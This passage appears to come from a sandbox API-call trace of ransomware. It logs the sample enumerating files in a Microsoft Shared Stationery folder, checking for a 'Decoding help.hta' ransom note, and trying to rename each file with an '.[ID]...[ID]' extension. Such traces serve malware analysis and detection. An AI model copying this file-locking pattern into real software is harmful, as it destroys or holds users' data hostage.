lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.578] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.578] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.578] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Genko_2.emf") returned -1 [0044.578] lstrlenW (lpString="Genko_2.emf") returned 11 [0044.578] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.578] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.578] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Genko_2.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" [0044.579] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" [0044.579] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0044.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.579] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5120721, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5120721, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4453be1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1c7f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Graph.emf", cAlternateFileName="")) returned 1 [0044.579] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.579] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.579] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.579] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Graph.emf") returned -1 [0044.579] lstrlenW (lpString="Graph.emf") returned 9 [0044.579] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.579] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.579] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Graph.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" [0044.579] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" [0044.579] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0044.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.579] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2d2cf5, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2d2cf5, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce071725, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Green Bubbles.htm", cAlternateFileName="")) returned 1 [0044.579] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.579] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.579] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.580] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Green Bubbles.htm") returned -1 [0044.580] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0044.580] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.580] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.580] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Green Bubbles.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" [0044.580] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" [0044.580] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0044.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.695] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2f8e52, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2f8e52, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa436a95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0x0, dwReserved1=0x0, cFileName="GreenBubbles.jpg", cAlternateFileName="")) returned 1 [0044.695] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.695] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.695] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.695] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.695] lstrcmpiW (lpString1="Decoding help.hta", lpString2="GreenBubbles.jpg") returned -1 [0044.695] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0044.695] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.695] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="GreenBubbles.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" [0044.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" [0044.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0044.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.696] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fc9adc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4fc9adc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4453be1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0x0, dwReserved1=0x0, cFileName="grid_(cm).wmf", cAlternateFileName="")) returned 1 [0044.696] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.696] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.696] lstrcmpiW (lpString1="Decoding help.hta", lpString2="grid_(cm).wmf") returned -1 [0044.696] lstrlenW (lpString="grid_(cm).wmf") returned 13 [0044.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.696] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="grid_(cm).wmf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" [0044.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" [0044.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf.[ID]g9uZrLhJaygpwRm1[ID]" [0044.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.696] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fa397f, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4fa397f, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44692a69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="grid_(inch).wmf", cAlternateFileName="")) returned 1 [0044.696] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.697] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.697] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.697] lstrcmpiW (lpString1="Decoding help.hta", lpString2="grid_(inch).wmf") returned -1 [0044.697] lstrlenW (lpString="grid_(inch).wmf") returned 15 [0044.697] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.697] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.697] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="grid_(inch).wmf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" [0044.697] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" [0044.697] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf.[ID]g9uZrLhJaygpwRm1[ID]" [0044.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.697] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0bd9df, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hand Prints.htm", cAlternateFileName="")) returned 1 [0044.697] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.697] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.697] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.697] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Hand Prints.htm") returned -1 [0044.697] lstrlenW (lpString="Hand Prints.htm") returned 15 [0044.697] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.697] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.697] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Hand Prints.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" [0044.697] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" [0044.697] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0044.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.770] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa45cbf3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HandPrints.jpg", cAlternateFileName="")) returned 1 [0044.770] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.770] lstrcmpiW (lpString1="Decoding help.hta", lpString2="HandPrints.jpg") returned -1 [0044.770] lstrlenW (lpString="HandPrints.jpg") returned 14 [0044.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common 